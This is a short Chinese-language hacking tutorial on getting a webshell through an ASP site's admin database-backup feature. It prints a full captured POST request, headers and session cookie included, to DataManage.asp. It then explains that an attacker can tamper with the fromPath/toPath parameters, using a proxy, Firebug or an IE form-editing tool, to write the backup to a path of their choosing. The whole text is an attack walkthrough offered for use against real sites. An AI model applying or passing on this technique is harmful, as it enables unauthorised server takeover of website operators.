简单突破数据库备份路径拿shell

当后台可以数据库备份的时候,你是否顿时笑了？可当备份路径不能修改,而且后缀是mdb不变,你情何以堪? 这里就说个很简单的办法,进行一次数据库备份,并抓包下来。

POST /manage/DataManage.asp?From=Confirm&Action=DataBackup&Result=Site HTTP/1.1

Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/QVOD, application/QVOD, */*

Referer: http://www.xxx.com.cn/manage/DataManage.asp? From=Confirm&Action=DataBackup&Result=Site Accept-Language: zh-cn User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate

Host: www.xxx.com.cn

Content-Length: 82

Connection: Keep-Alive Cache-Control: no-cache

Cookie: ASPSESSIONIDSADBRDSC=DOELADFALPBDPFKKHJGKGOAO; cnzz_a1183540=0; sin1183540=; rtime=0; ltime=1307114195812; cnzz_eid=78248833-1307114200-

 

 fromPath=..%2FDatabase%2Fameav_Site.mdb&toPath=..%2FDatabase%2FBak_ameav_Site.mdb

 

然后...然后...然后改路径,提交啊,路径可全在这了。 此外,如果RP够好.在提交表单的时候程序先从表单读值再执行备份的话,可以更YD..NC也不用了 1.如果你是用的火狐浏览器,装个Firebug 插件.即可随意YY~~ 2.用的IE浏览器,可以使用啊D写的IE恶搞迷进行修改.不过大多时候是调用的网页,你需要找到真实的目标网页.才能去往真实的世界 :D